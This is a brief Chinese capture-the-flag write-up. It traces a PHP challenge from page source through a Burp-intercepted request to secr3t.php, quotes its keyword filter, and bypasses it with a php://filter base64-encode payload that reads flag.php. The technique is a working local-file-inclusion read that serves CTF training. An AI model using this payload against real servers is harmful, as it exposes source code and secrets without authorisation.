根据提示,猜测这个页面可能隐藏了信息
查看源代码:
发现了/Archive_room.php
点一下密码啥都没有
用burp抓包 抓到action.php
得到secr3t.php
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
过滤了 ../ input tp data
但是没有过滤filter,我们可以用php://fileter来获取文件
构造url:http://xxxxxxx/secr3t.php ?file=php://filter/convert.base64-encode/resource=flag.php
得到flag.php的密文
base64在线解密
得到 flag